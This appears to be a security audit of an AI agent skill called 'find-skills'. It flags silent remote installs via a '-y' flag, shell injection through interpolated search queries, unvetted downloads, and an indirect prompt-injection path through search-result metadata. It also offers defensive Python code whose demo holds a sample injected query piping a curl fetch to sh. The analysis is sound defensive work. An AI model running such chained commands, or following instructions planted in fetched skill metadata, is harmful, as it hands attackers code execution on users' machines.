find-skills
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH
Tags: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (HIGH): The skill instructs the agent to install third-party packages with 'npx skills add -g -y'. The '-y' flag is the high-risk pattern here: it suppresses the user confirmation prompt, so code fetched from a remote source such as GitHub can be installed and executed silently, with no point at which a human reviews what is about to run.
- [COMMAND_EXECUTION] (HIGH): The skill relies on shell command execution via 'npx' for searching and managing packages. User-provided queries are interpolated directly into the command ('npx skills find [query]'). If the agent assembles that command as a single shell string rather than passing the query as a separate argument, shell metacharacters in the query (';', '|', '$(...)', backticks) can terminate the intended command and chain an attacker-chosen one; the skill defines no sanitization that would prevent this.
- [EXTERNAL_DOWNLOADS] (MEDIUM): The primary purpose of the skill is to fetch and install external code. Although it references a trusted repository, 'vercel-labs/agent-skills', the underlying mechanism accepts any repository reference, so nothing confines installation to vetted sources and a malicious or typosquatted repository could be installed just as readily.
- [PROMPT_INJECTION] (LOW): The skill exposes a surface for Indirect Prompt Injection (Category 8).
  - Ingestion points: user-supplied search queries and the textual output of the 'npx skills find' command are both processed by the agent.
  - Boundary markers: there are no explicit delimiters or safety instructions to stop the agent from following instructions embedded in the metadata or descriptions of external skills returned by a search.
  - Capability inventory: the agent can execute shell commands and perform software installations on the basis of those search results, so injected text has a direct path to code execution.
  - Sanitization: the skill defines no validation or sanitization logic for data ingested from the external 'skills' ecosystem.
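The COMMAND_EXECUTION, REMOTE_CODE_EXECUTION and EXTERNAL_DOWNLOADS findings above all come down to how the agent builds the two 'npx skills' invocations. The following Python is an added example written for this report, not code from the audited skill or from the 'skills' CLI: it builds each command as an argv list (never a shell string), rejects queries containing shell metacharacters, refuses to emit the '-y' flag, and confines 'skills add' to an allowlist of repositories. The allowlist contents, the query character set, and the assumption that 'npx skills add -g <owner/repo>' takes the repository as a positional argument are all assumptions made here, not facts stated in the audit.

```python
"""Added example: build `npx skills` invocations without shell interpolation.

Not part of the audited 'find-skills' skill. The positional `<owner/repo>`
argument form for `skills add` is an assumption about the CLI.
"""
import re
import shlex
import subprocess
from typing import List

# Assumption for this example: the only repository the agent may install from.
# The audit names 'vercel-labs/agent-skills' as the trusted reference.
ALLOWED_REPOS = {"vercel-labs/agent-skills"}

# Conservative allowlist for a search query: letters, digits, space, '.', '_', '-'.
# Quotes, ';', '|', '&', '$', backticks and newlines are all rejected outright.
_QUERY_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,64}$")
_REPO_RE = re.compile(r"^[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+$")
_SHELL_METACHARS = ";|&$`\n<>(){}"


def query_is_safe(query: str) -> bool:
    """True only if the query matches the strict allowlist."""
    return _QUERY_RE.fullmatch(query) is not None


def repo_is_allowed(repo: str) -> bool:
    """True only if the reference is well-formed AND on the allowlist."""
    return _REPO_RE.fullmatch(repo) is not None and repo in ALLOWED_REPOS


def build_find_argv(query: str) -> List[str]:
    """argv for `npx skills find <query>`, with the query as ONE argument.

    Because the list is passed to subprocess with shell=False, the query can
    never terminate the command or start another, whatever it contains.
    """
    if not query_is_safe(query):
        raise ValueError(f"query rejected by allowlist: {query!r}")
    return ["npx", "skills", "find", query]


def build_add_argv(repo: str) -> List[str]:
    """argv for `npx skills add -g <repo>`.

    The audit's high-risk pattern is the '-y' flag, which suppresses the
    confirmation prompt; this builder never emits it, so the install still
    stops for a human to approve. Repositories outside ALLOWED_REPOS are refused.
    """
    if not repo_is_allowed(repo):
        raise ValueError(f"repository refused: {repo!r}")
    return ["npx", "skills", "add", "-g", repo]


def naive_shell_string_misparses(query: str) -> bool:
    """Demonstrate the audit's concern about interpolation.

    The naive f-string 'npx skills find {query}' is re-tokenised by a shell.
    Returns True when the query would not reach the tool as exactly one
    argument: either it carries metacharacters that chain commands, or it
    splits into extra tokens (even a bare space does that).
    """
    naive = f"npx skills find {query}"
    if any(c in query for c in _SHELL_METACHARS):
        return True
    try:
        tokens = shlex.split(naive)
    except ValueError:  # unbalanced quotes also break the intended parse
        return True
    return len(tokens) != 4


def run(argv: List[str]) -> subprocess.CompletedProcess:
    """Execute an argv list with shell=False. Not invoked in this offline example."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Constructed inputs: one benign query, one injection attempt.
    print(build_find_argv("react testing"))
    print(naive_shell_string_misparses("react; curl http://example.invalid | sh"))
    print(build_add_argv("vercel-labs/agent-skills"))
```

The output of 'npx skills find' still needs to be handled as untrusted data before it reaches the model (the PROMPT_INJECTION finding); this block only closes the command-construction and unconfirmed-install paths.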
Recommendations
- AI detected serious security threats
Audit Metadata